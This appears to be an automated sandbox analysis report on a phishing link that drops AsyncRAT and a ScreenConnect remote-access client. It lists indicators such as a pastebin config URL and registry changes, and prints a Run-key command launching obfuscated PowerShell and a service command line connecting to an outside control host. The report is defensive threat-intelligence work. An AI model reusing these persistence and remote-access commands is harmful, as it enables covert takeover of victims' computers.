Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/11/2024, 16:13
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://s6tmj.mjt.lu/lnk/AVwAAFW6A7oAAAAAAAAAA8kYNeQAAYKI7_QAAAAAACy0JQBnLz1xwUABtbMRRauPOv-Di8-6fgApOQU/0/uE1z8SManLuehFT6wLW-XQ/aHR0cHM6Ly9pci1zZWNmaWxlLmNvbS8?b=2
Resource
win10v2004-20241007-en
General
-
Target
https://s6tmj.mjt.lu/lnk/AVwAAFW6A7oAAAAAAAAAA8kYNeQAAYKI7_QAAAAAACy0JQBnLz1xwUABtbMRRauPOv-Di8-6fgApOQU/0/uE1z8SManLuehFT6wLW-XQ/aHR0cHM6Ly9pci1zZWNmaWxlLmNvbS8?b=2
Malware Config
Extracted
asyncrat
AWS | 3Losh
The--capable
AsyncMutex_alcod
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/SBj8AU2u
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 8 IoCs
flow pid Process 74 5548 powershell.exe 79 5296 msiexec.exe 81 5296 msiexec.exe 83 5296 msiexec.exe 86 5296 msiexec.exe 87 5296 msiexec.exe 90 5296 msiexec.exe 91 3188 msiexec.exe -
pid Process 5924 powershell.exe 5600 powershell.exe 5548 powershell.exe 3556 powershell.exe -
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e irs.Client.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 irs.Client.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (83a0ca4c-6344-443e-a070-0d8579e16390)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\LM26HD1C.680\\TJ9JBCGV.7R7\\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=cloudservmeta.com&p=8041&s=83a0ca4c-6344-443e-a070-0d8579e16390&k=BgIAAACkAABSU0ExAAgAAAEAAQDFjB2g4Qj6P0OOcaubTsssjqZiXywMluyeG%2bCLmQAKDlT6DfGyVZsalU3SBL%2fGwTwODVH8XOZ8mng6mpjWpi6W8REf0G2nj00QSE1T0gIuqWmgvF8xUiJ39mPaKanlx74d5Ywscq11tucZ6um%2b5Z7QrxKOxStdzLy23qwPGw6iORx8E4e1IOW%2fS5Q1PWS7uo5UFbCy0T5L0%2bwJqlyh6JFwjT2dUsLcbWRG1IA%2b6nSVohNhBbaoP3uWnhj5E60SAxhCf%2b0bwj%2bja7rOrcFv8mLmVbb9RJ2UPmn7wcJQ60BenbznHQ95limB5jS0%2b1U2rxtHuDDc2hyh9%2blggo0jCsjN&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAmvMlOjLuiUGLiTyA1w8UFwAAAAACAAAAAAAQZgAAAAEAACAAAADtWdLHBp%2fKK7e5ltBmBSC7nV%2f1KSVNLetN3q05Xwg9swAAAAAOgAAAAAIAACAAAADIV2z0yUleIExkW91eVR7iJXWAUUWIk5rSoasDiEUtN6AEAABdOuBLBlzg0jP2INY0ldz1kCw9hX1S664xVeVR7qbBEi0OVX5EIcsVyv4Z%2bb%2bYC1v3Z1LQw7BgHiIaNsGZbEHJqvxrtbbMD%2bT5t%2fkrngexW6y94IgYrf1QFGARB5ySugQnkGqoIYkQ1DvV%2brI4acFLMDb9vwXOJJ2qaqfkYRQwiNL0lPA7JAPID1h68rnfS68oZUcHTcfPvxkVX8at%2fLhSVcWTgPDbocqrPzkxcvwPaW0GoHwkjgbpGhRUmggWDFA7trAxUiXnd5E6fHcW3ZByoSfcc1VgCbVk3I%2bpaGgIJhyJq7ZSKDPZ0Iv7lOXygpW9JEmIgKsm0sbqN9fOOFWkKHjqNw62YW7imvV9CtpNlip3z%2bYUYc0g9YjBEYP8ZiLNYULIzCfO5oD0MvX0fwlBiXvB2LWBznijrNp6ObswTRJtaF5NYMwH6x3lwkeMH3oCz%2bjQJESOLJS%2fEBaSNML9yRxGpaOZAWaD%2fNoXg2amyfltucmDIGx3M6lZXr04ovP0siYE8ZhUlEzmfnnl9kTeWSUrIS0q1jVgL6eX7gbA%2boVLDtZ0Zwd%2fa9x43UNBlC0%2b4ErAGh50%2fE7M410FAvPlhrapV1Ji%2f0onvXlGUYsidS%2fBNMNP4MUBNIOI547nwCFrQ9Gb8%2bJzj846R7pRXwt1wH3wwWBmBeRNpojvLyBYoTzugoOolM4dDu4kuH1AgG9fba3KUZgIaZ32hywiW2hE%2fyvgnoN11zRZoy3TJmDQlJ3bSLiOG78Vg31j0OKKGbB9uLZFC0mivwvjsX2KH6OamXAMSAD6shGqOmUp81nzkHFAGU2i6CRvNqzC%2bQv%2bzyttVg5HmAoOnE43I1hngkoIb6Jzv6nxZHlvbhhYdHDkCNaDxRz6U%2fJCGmA3mu7CU14GR5jys4hmIUbpVI%2fPdiMiGQHV%2bCnGn7apVIfV1Iw2XfDwqY9E6ZTOhxO%2fTpaYio1WJ2K0m5MVAIkYnQwNFi1oPZMJYtiqG49thblE7yoBbH%2fu3HY8stpW94Ibb8FUR8mQEFXVUya4rt2kungMO1%2byH3mZIcqnEvN%2bO8pmLsJoeSBsw5itR7bDDE8RxTjqksRGiHWfLD1tp9uRzDzu8aQdPASwMB%2bemGuEVEwxMyk7st77ntPUAaNtXawL7GabPgi7iEWzzQy%2fLidqkCN9IgVfaYcTsLvPtcfpK%2b4Je1SV4%2bRuQTF79sYwNh%2bDBzFsk5W1%2fbrdJVk2YRQH9%2b37%2bLlC3a3bf7TuKgQZzEhvjMJhj7xE0zy3yWnSHaKcdF%2fBr%2b%2bl0gmF69pzzl782LhHmtnTN4ayrh1i7DypnJiok0DU%2fVB4ddcWuDrVLnaXUUgrm%2fE8p4LTG3ZhDaQr%2fF5Kskx0C%2fPMdrC%2fj2I11gicg4mcvC8IWLfKcJXuNcnwUOJGXo4zU%2b9N2V0NbCV6y8EsYQQNKPAivyPlKv9H%2frKY%2b7fhaopdf28f%2bVNVZYErM7%2fQnrw5v%2by2FM7iPhPcGoeKnqqb5muhijcbW00fGZmwIsePG85Ypef54a537D83lLSIQyKV%2f809JsGwZw%2fN2erqM8fa8K7YSjcCt4QhD3GXwtRTHkAAAACgwRqLJKrrq%2bUy7Vokwon9s3fEexTpOfbQZd9Ojt%2b07bK2Kp6t11tUQUXwB7r45r3hhgWxjGjYjAOb61GVU7aL&r=&i=\" \"1\"" ScreenConnect.ClientService.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation ScreenConnect.WindowsClient.exe -
Executes dropped EXE 8 IoCs
pid Process 4888 irs.Client.exe 5556 ScreenConnect.WindowsClient.exe 5868 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 6088 ScreenConnect.WindowsClient.exe 3392 ScreenConnect.WindowsClient.exe 5540 ScreenConnect.WindowsClient.exe 3764 ScreenConnect.WindowsClient.exe -
Loads dropped DLL 16 IoCs
pid Process 5868 ScreenConnect.ClientService.exe 5868 ScreenConnect.ClientService.exe 5868 ScreenConnect.ClientService.exe 5868 ScreenConnect.ClientService.exe 5868 ScreenConnect.ClientService.exe 5868 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe 5968 ScreenConnect.ClientService.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nonletters = "%Rewithdrawal% -windowstyle 1 $Kammesjukkernes=(gp -Path 'HKCU:\\Software\\Parahypnosis\\').Defoil;%Rewithdrawal% ($Kammesjukkernes)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 86 pastebin.com 85 pastebin.com -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 5296 msiexec.exe 3188 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 5924 powershell.exe 5296 msiexec.exe 5600 powershell.exe 3188 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5396 4888 WerFault.exe 124 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irs.Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 10 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_c086620a = 68747470733a2f2f636c6f7564736572766d6574612e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\Transform = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\Files\ScreenConnect.WindowsClient.exe.config_f7f = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e96e58cc0d8feed3\DigestValue = 81a360a3f97dcbafb92cf78373ac17efdefe60e6 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\DigestMethod = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\Files\ScreenConnect.WindowsFileManager.exe.confi = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_743ff44d8ef80381\scre..ient_4b14c015c87c1ad8_0018.0003_none_e96e58cc0d = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04ac934293fffc3a\Transform = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\Files\ScreenConnect.WindowsClient.exe_6492277df2 = 01 dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30003000300031002f00300031002f00300031002000300030003a00300030003a00300030000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\DigestValue = e130fcebd6f69ccbc53ec1ec677892c9216ed0a7 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_5358faf9fe4098cf\DigestMethod = 01 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_b49fd41de7247bdc\lock!1a0000009b02580eb4150000c41500000000000000000000 = 30303030313562342c30316462333263323665346138363561 ScreenConnect.WindowsClient.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 460061006c00730065000000 dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38e3d304a8f4613e\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e362e393035362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c dfsvc.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38e3d304a8f4613e dfsvc.exe Set value (data) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97ef996e4275975b\SizeOfStronglyNamedComponent = c04f040000000000 dfsvc.exe Set value (data) 